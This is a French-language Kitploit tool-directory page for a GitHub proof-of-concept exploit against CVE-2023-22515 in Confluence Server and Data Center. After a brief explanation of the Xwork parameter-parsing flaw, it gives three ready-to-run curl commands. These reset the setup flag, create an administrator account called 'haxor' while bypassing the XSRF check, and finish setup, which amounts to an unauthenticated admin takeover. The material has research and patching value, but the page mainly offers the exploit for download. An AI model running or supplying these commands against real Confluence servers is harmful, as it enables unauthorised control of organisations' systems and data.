Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-22515-POC — Exploit de preuve de concept pour CVE-2023-22515, une vulnérabilité critique de contrôle d'accès cassé dans Confluence Server et Data Center, permettant une prise de contrôle administrative non authentifiée. | Kitploit
Outils/GitHubGitHub/j3seer/cve-2023-22515-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

Exploit de preuve de concept pour CVE-2023-22515, une vulnérabilité critique de contrôle d'accès cassé dans Confluence Server et Data Center, permettant une prise de contrôle administrative non authentifiée.

Voir le dépôt
824il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-22515

CVE-2023-22515, une vulnérabilité critique affectant les instances sur site de Confluence Server et Confluence Data Center, une vulnérabilité de contrôle d'accès brisé. Attlassian a attribué un score CVSS de base de 10.0

Exploit

Explication brève :

1- En raison de la façon dont les intercepteurs Xwork analysent les paramètres, /test.action?one=a équivaut à setOne()='a' et /test.action?one.two=a équivaut à getOne().setTwo()="a"

2- Les points de terminaison /setup/* incluent un appel @ParameterSafe qui nous permet d'utiliser les méthodes set et get comme dans . Cependant, comme les points de terminaison sont bloqués car la configuration est terminée, peut être utilisé

/setup/setupdb.action?dbConfigInfo.databaseType=postgresql
/setup/*
/server-info.action

3- Trouvez la méthode set pour terminer la configuration => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

4- Utilisez l'en-tête "X-Atlassian-Token" pour contourner XSRF

root@kitploit:~
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

Références

AVERTISSEMENT : L'exploit n'a pas été découvert ou créé par moi, le crédit revient aux articles ci-dessous

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

Télécharger l’outil